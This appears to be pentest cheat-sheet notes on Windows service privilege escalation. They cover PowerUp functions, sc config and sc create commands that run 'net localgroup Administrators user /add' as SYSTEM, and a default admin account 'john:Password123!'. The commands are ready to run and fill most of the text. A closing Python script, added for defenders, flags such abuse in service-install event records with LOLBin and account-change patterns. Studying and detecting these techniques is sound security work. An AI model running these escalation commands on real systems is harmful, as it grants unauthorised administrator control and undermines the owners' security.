Takes a pre-compiled C# service binary and patches in the appropriate commands needed for service abuse. If a -UserName/-Password or -Credential is specified, the command patched in creates a local user and adds them to the specified -LocalGroup, otherwise the specified -Command is patched in. The binary is then written out to the specified -ServicePath. Either -Name must be specified for the service, or a proper object from Get-Service must be passed on the pipeline in order to patch in the appropriate service name the binary will be running under.
```powershell
# Enumeration
Invoke-AllChecks
Get-ServiceUnquoted

# Abuse
Write-ServiceBinary -Name 'service' -Path <HijackPath>    # (will add john:Password123!)
Write-ServiceBinary -Name 'service' -Path C:\WebServer\Abyss.exe -Command "net localgroup Administrators user /add"

# Restart Service (cmd)
sc stop service
sc start service
```
Replaces the service binary for the specified service with one that executes a specified command as SYSTEM.
Takes a service Name or a ServiceProcess.ServiceController on the pipeline where the current user can modify the associated service binary listed in the binPath. Backs up the original service binary to "OriginalService.exe.bak" in the service binary's location, and then uses Write-ServiceBinary to create a C# service binary that either adds a local administrator user or executes a custom command. The new service binary is written to the original service binary path, and a custom object is returned that captures the original and new service binary configuration.
```powershell
# Enumeration
Invoke-AllChecks
Get-ModifiableServiceFile

# Abuse
Install-ServiceBinary -Name 'service'    # (will add john:password123!)
Install-ServiceBinary -Name 'service' -Command "net localgroup Administrators user /add"

# Manual
Write-ServiceBinary -Name 'service' -Command "command" -Path "C:\service\write.exe"

# Restart Service (cmd)
sc stop service
sc start service

# Cleanup
Restore-ServiceBinary -Name service -BackupPath 'C:\temp\backup.exe'
```
Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current user has configuration modification rights on and executes a series of automated actions to execute commands as SYSTEM. First, the service is enabled if it was set as disabled and the original service binary path and configuration state are preserved. Then the service is stopped and the Set-ServiceBinPath function is used to set the binary (binPath) for the service to a series of commands, the service is started, stopped, and the next command is configured. After completion, the original service configuration is restored and a custom object is returned that captures the service abused and commands run.
```powershell
# Enumeration
Invoke-AllChecks
Get-ModifiableService

# Abuse
Invoke-ServiceAbuse -Name 'service'    # (will create a local admin john:Password123!)
Invoke-ServiceAbuse -Name 'service' -Command "net localgroup Administrators user /add"

# Manual
sc config "servicename" binPath= "cmd.exe /c net localgroup administrators user /add"
sc stop "servicename"
sc start "servicename"
```
```powershell
# show permissions for service creation
cmd /c sc sdshow scmanager
```
This shows the SDDL for scmanager. It is possible for a low-privilege user to be included in it.
https://itconnect.uw.edu/wares/msinf/other-help/understanding-sddl-syntax/
```powershell
# Launch service as SYSTEM from a user account
sc create MyService displayName= "MyService" binPath= "C:\Windows\System32\net.exe localgroup Administrators USER /add" start= auto
# Restart the computer and the user will be an admin
```
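From the defender's side, the `sc config binPath=` and `sc create ... binPath=` steps above leave a service whose image path is a LOLBin plus an account-change command, which is what service-install telemetry (Event ID 7045, or a Sysmon ImagePath registry change) records. The following is an added detection example, not part of PowerUp or the original notes; the event records are constructed to resemble 7045 fields and the field names are assumptions.

```python
"""Triage service-install records for the patterns left by binPath/sc create abuse."""
import re

# Constructed sample records modelled on Event ID 7045 (not real log data):
# "name" ~ Service Name, "image" ~ Service File Name (ImagePath).
SAMPLE_EVENTS = [
    {"event_id": 7045, "name": "MyService",
     "image": r"C:\Windows\System32\net.exe localgroup Administrators USER /add"},
    {"event_id": 7045, "name": "Spooler Helper",
     "image": r"C:\Program Files\Vendor Tools\helper.exe"},
    {"event_id": 7045, "name": "VendorSvc",
     "image": r'"C:\Program Files\Vendor\svc.exe" --service'},
]

# A service image that is really a shell or net.exe rather than a service executable.
LOLBIN_RE = re.compile(r"(?:^|\\)(?:net1?|cmd|powershell|pwsh|rundll32)\.exe\b", re.IGNORECASE)
# "net user <name> ... /add" or "net localgroup <group> ... /add" style account changes.
ACCOUNT_CHANGE_RE = re.compile(r"\b(?:localgroup|user)\s+\S+.*\s/add\b", re.IGNORECASE)


def service_image_findings(event):
    """Return the reasons (possibly none) a service record looks like binPath abuse."""
    image = event["image"]
    reasons = []
    if LOLBIN_RE.search(image):
        reasons.append("image path runs a shell/LOLBin instead of a service executable")
    if ACCOUNT_CHANGE_RE.search(image):
        reasons.append("command adds a user or group member")
    # Unquoted path containing spaces: the SCM tries each space-delimited prefix
    # first, which is the condition Get-ServiceUnquoted enumerates.
    if not image.startswith('"') and " " in image.lower().split(".exe")[0]:
        reasons.append("unquoted image path containing spaces")
    return reasons


def triage(events):
    """Map service name -> findings for every record that produced at least one."""
    flagged = {}
    for event in events:
        findings = service_image_findings(event)
        if findings:
            flagged[event["name"]] = findings
    return flagged


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS).items():
        print(f"{name}: {'; '.join(reasons)}")
```

A binary swapped in place by Install-ServiceBinary leaves the ImagePath unchanged, so this check must be paired with file-integrity or hash monitoring of service executables and with periodic review of the scmanager SDDL shown above.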